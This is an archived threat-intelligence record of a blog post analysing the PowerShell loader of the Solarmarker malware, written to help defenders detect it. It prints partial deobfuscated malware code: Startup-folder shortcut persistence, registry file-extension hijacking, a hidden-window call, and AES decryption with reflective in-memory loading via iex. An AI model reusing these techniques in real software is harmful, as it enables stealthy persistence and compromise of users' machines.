{
	"id": "11510899-488c-4844-8c1c-88d33b541258",
	"created_at": "2026-04-06T00:19:52.234016Z",
	"updated_at": "2026-04-10T03:21:24.084918Z",
	"deleted_at": null,
	"sha1_hash": "785d0dfc1b47fcb9410d6841be571fa04e72f473",
	"title": "Solarmarker: The Old is New",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 641828,
	"plain_text": "Solarmarker: The Old is New\r\nPublished: 2022-09-27 · Archived: 2026-04-05 16:28:56 UTC\r\nThe purpose of this blogpost is to document the PowerShell used by Solarmarker. The PowerShell was first\r\nobserved between Feb 2022 until May 2022 and then resurfaced in September 2022.\r\nThe goal of this post is to publish information regarding the PowerShell to enable others to identify and\r\nunderstand what the PowerShell is doing.\r\nDetecting these tactics is important to detect Solarmarker and detecting other malware.\r\nIntro\r\nFrom May 2022 – August 2022, the Solarmarker Developer moved away from using PowerShell scripts and from\r\nexecuting PowerShell using System.Automation.Management.dll to creating persistent with native .NET\r\ncommands. The use of PowerShell was observed between Feb 2022 and May 2022. The PowerShell was also\r\nobserved in a recent sample and as a result, it became worthwhile to publish about the PowerShell. The\r\nPowerShell during both periods is virtually the same helping us identify the malware easily and consistently\r\nidentify the malware as Solarmarker.\r\nScript Overview\r\nPowerShell script content can be logged with PowerShell Scriptblock Logging, or it can be logged through EDR.\r\nIn this instance, the detection logged 13 massive blocks of PowerShell. Most of the PowerShell script blocks\r\nconsisted of a Base64 encoded payload. I’ve included the PowerShell below without the encoded payload.\r\nThe PowerShell script is normally one block, but we’ve broken it up for readability in the image below.\r\nhttps://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/\r\nPage 1 of 6\n\nImage: PowerShell from the payload. .\r\nFirst, let’s talk about the (many) red flags that suggest it’s malicious:\r\nThe functions and variables don’t have human readable names.\r\nSometimes, there’s a good reason to have short and simple PowerShell function or variable names, but in many\r\ncases, PowerShell should be easy to follow. This helps analysts understand what is happening and helps\r\ndevelopers revise the PowerShell when needed. In this case, the long random names are suspicious.\r\nThe PowerShell uses “chunking.”\r\nChunking is breaking up words to avoid detection. For example,\r\n‘\\M’+’icr’+’oso’+’ft’+’\\W’+’ind’+’ow’+’s\\’+’St’+’art’+’ Me’+’nu’+’\\Pr’+’ogr’+’ams\\’+’St’+’art’+’up’. This\r\nchunking can prevent some detections from catching the full words. Chunking is abnormal for benign scripts and\r\nis an indicator the author is trying to avoid being detected.\r\nThe script uses “Reflection.Assembly” to load something into memory.\r\n“Reflection.Assembly” has legitimate uses, but combined with the other red flags, this tells us the author is\r\nloading a DotNet binary into memory instead of writing it to disk. This prevents antivirus from finding the binary\r\non disk, as the payload is only decrypted in memory.\r\nThe massive Base64 string is suspicious. \r\nBase64 encoding can have legitimate purposes. But, if it’s uncommon in an environment or if an administrator or\r\ndeveloper is unfamiliar with the Base64 used, the PowerShell should be considered suspicious.\r\nhttps://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/\r\nPage 2 of 6\n\nThe use of AES encryption in a script (“AesCryptoService Provider”).\r\nUsing AES encryption is a reliable way for malware to avoid detection, and it’s uncommon and highly unusual to\r\nfind it in legitimate PowerShell scripts.\r\nThe script uses “iex,” also known as “Invoke Expression.”\r\nInvoke Expression is a common way for attackers to execute code. When reviewing PowerShell, it’s important to\r\ninvestigate what’s being executed. When “iex” is used, it should be considered suspicious.\r\nScript Content\r\nTo make the PowerShell script more readable, we use “find and replace” to rename variables based on what we\r\nthink each part is doing, given the surrounding context. Find and replace allows us to clarify where the same\r\nvariables are reused. \r\nIf you do this, be prepared to make guesses that you’ll likely revise later. In renaming the variables, we may also\r\nneed to do some Googling to better understand functions and to help us give the variables better names. If you\r\ncan’t read the image, don’t worry, parts will be copied below.\r\nImage: PowerShell after variables have been renamed.\r\nNow that we’ve cleaned up the PowerShell, we finally have an idea of what’s going on.\r\nThe PowerShell first sets up two functions: “create_random,” which is used for generating random numbers later,\r\nand “create_registry_key.” “Create_registry_key” takes two parameters: the path of the registry key to be created\r\nand the content the key will have.\r\nfunction create_random {\r\nreturn -join (0..(10..30|Get-Random)|%{char+(97..122)|Get-Random)})\r\n}\r\nfunction create_registry_key { param($registryKeyPath, $registryKeyContent);\r\nif (-Not (Test-Path \"Registry::$registryKeyPath \".Trim())){\r\nNew-Item -Path \"Registry::$registryKeyPath \".Trim() -ItemType RegistryKey -Force;\r\n}\r\nhttps://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/\r\nPage 3 of 6\n\nSet-Item -Path \"Registry::$registryKeyPath \".Trim() -Value $registryKeyContent;\r\n}\r\nThe PowerShell imports a Windows DLL (user32.dll) to access the Windows API “‘Win32ShowWindowAsync’.”\r\nUsing this Windows API, the malware can make sure the PowerShell or current window stays hidden at execution.\r\n$hiddenWindow=\"$showWindowAsync=Add-Type -MemberDefinition ('[DllImport(\"user32.dll\")]public static extern bool\r\niex $hiddenWindow;\r\nThe script then creates a few random names, and also creates a directory in the user’s temporary directory. This\r\nrandomly named folder, with a randomly named file, with a random file extension, will be used later: for now, it’s\r\nsaved as “$pathToWriteTo.”\r\n$randomFileName=(create_random);\r\n$newFileExtension=(create_random);\r\n$randomFolderInTemp=\"$env:temp\\\"+(create_random);\r\nNew-Item -ItemType Directory -Force -Path $randomFolderInTemp;\r\n$pathToWriteTo = $randomFolderInTemp+'\\'+$randomFileName+'.'+$newFileExtension;\r\nAfter this path is created, a shortcut, or “.lnk” file, is created in the user’s Startup folder. The shortcut is created\r\nusing WScript, which will have a random name and point to our $pathToWriteToFile variable. This is a favorite\r\ndirectory for malware authors, as files in it are executed on startup.\r\n$wscriptCommand=New-Object -comObject WScript.Shell;\r\n$startupShortcut=$wscriptCommand.CreateShortcut($env:appdata+'\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'+(\r\n$startupShortcut.TargetPath=$pathToWriteTo;\r\n$startupShortcut.WindowStyle=7;\r\n$startupShortcut.Save();\r\nThe PowerShell then uses the “create_registry_key” function defined earlier. It creates\r\n“HKEY_CURRENT_USER\\Software\\Classes\\”+$extensionClass+”\\shell\\open\\command,” which holds\r\n“powershell -command $binaryDecodeAndExecute.”\r\nThe variable “$binaryDecodeAndExecute” uses AES to decrypt the “LARGE-BLOCK-OF-BASE64” after it’s\r\ndecoded from base64. \r\nThis variable also contains two cryptic lines:\r\n[Reflection.Assembly]::Load($UB);[cU0tev650WfbmHd2R.ArdcDR284Rt7PtrhOYIn]::jXEOyajI0oTBaWmmdt()\r\nThese lines load this DotNet module into memory using “Reflection Assembly” and then execute it using a\r\nfunction exported by the module. The random strings are to avoid detection: previously, defenders would flag the\r\nbinary’s name, but the author has now randomized it.\r\nhttps://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/\r\nPage 4 of 6\n\n$binaryDecodeAndExecute = $hiddenWindow+ \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;\r\n$AC.Key=[Convert]::FromBase64String('U1+GbY9S+sraJD5n+VLaXjIEFeFkMaccxdshs7f3+5E=');\r\n$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('\"+$pathToWriteTo+\"'));\r\n$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();\r\n$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);\r\n$AC.Dispose();\r\n$extensionClass=(create_random);\r\ncreate_registry_key -registryKeyPath (\"HKEY_CURRENT_USER\\Software\\Classes\\\"+$extensionClass+\"\\shell\\open\\command\r\ncreate_registry_key -registryKeyPath (\"HKEY_CURRENT_USER\\Software\\Classes.\"+$newFileExtension) -registryKeyConte\r\n[IO.File]::WriteAllText($pathToWriteTo, ‘LARGE-BLOCK-OF-BASE64’);\r\niex $binaryDecodeAndExecute;\r\nThe first part of this block calls the necessary functions to decrypt the binary and all of the decrypting commands\r\nare saved in the registry.\r\nThe second “create_registry_key” function sets up a registry key that will call the other registry key that was just\r\nestablished. This establishes an execution chain every time the computer is rebooted. This is explained in the\r\nfollowing screenshots from a sandboxed environment.\r\nAs described previously, a file (“ydCbwPDZwnuefc”) was created in the Startup folder. This shortcut executes a\r\nfile with a really long name. The file names are created by the “create_random” function and they differ between\r\ninfections.\r\nImage: The file in the Startup directory for running the malware at each boot\r\nThis file is stored in the user’s local temp directory. The file with a really long name has a random extension:\r\n“PSDQD…” When this extension is used, it takes info stored in the randomly named “xqmsyf…” registry key.\r\nhttps://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/\r\nPage 5 of 6\n\nImage: The file with a new file extension and the file extension in the Windows registry\r\nThe “xqmsyf…” registry key contains the PowerShell command the script set up earlier. This PowerShell is the\r\ndecryption and execution process noted above.\r\nImage: The registry key that contains the PowerShell to decode and execute the backdoor.\r\nAt the end of the script, the author also used “iex $binaryDecodeAndExecute” to execute the binary file and start\r\nthe backdoor for its first run.\r\nOutro\r\nWe’ve looked thoroughly at the PowerShell script used by Solarmarker in Feb 2022 – May 2022; and which was\r\nrecently seen in September 2022. I hope this analysis helps you in identifying the malware in the past, present, and\r\nfuture.\r\nSource: https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/\r\nhttps://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/"
	],
	"report_names": [
		"solarmarker-the-old-is-new"
	],
	"threat_actors": [],
	"ts_created_at": 1775434792,
	"ts_updated_at": 1775791284,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/785d0dfc1b47fcb9410d6841be571fa04e72f473.pdf",
		"text": "https://archive.orkl.eu/785d0dfc1b47fcb9410d6841be571fa04e72f473.txt",
		"img": "https://archive.orkl.eu/785d0dfc1b47fcb9410d6841be571fa04e72f473.jpg"
	}
}